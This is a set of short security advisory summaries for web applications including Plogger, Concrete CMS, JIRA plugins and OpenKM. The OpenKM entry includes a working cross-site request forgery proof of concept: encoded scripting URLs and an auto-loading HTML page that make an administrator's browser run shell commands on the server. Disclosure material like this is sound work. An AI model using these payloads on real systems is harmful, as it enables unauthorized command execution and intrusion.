Plogger Photo Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.
Attackers can exploit these issues to steal cookie information, execute arbitrary client-side script code in the context of the browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.
Concrete CMS is prone to multiple cross-site scripting vulnerabilities, an arbitrary-file-upload vulnerability, and a denial-of-service vulnerability. An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Concrete CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly handle user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the webserver process.
The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.
OpenKM is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application. OpenKM 5.1.7 is vulnerable; other versions may also be affected.
Log in as administrator (having the AdminRole) and call the URL in a different browser window:
    http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B
Alternatively, the administrator could browse a prepared HTML page in a new tab:
    <html>
    <body>
    <script>
    img = new Image();
    img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"
    </script>
    </body>
    </html>
The above exploit does nothing more than create a file in /tmp:
    String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
    Runtime.getRuntime().exec(cmd);
Some might also want to browse directories:
    http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B %0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A++++DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%29+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
JIRA and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.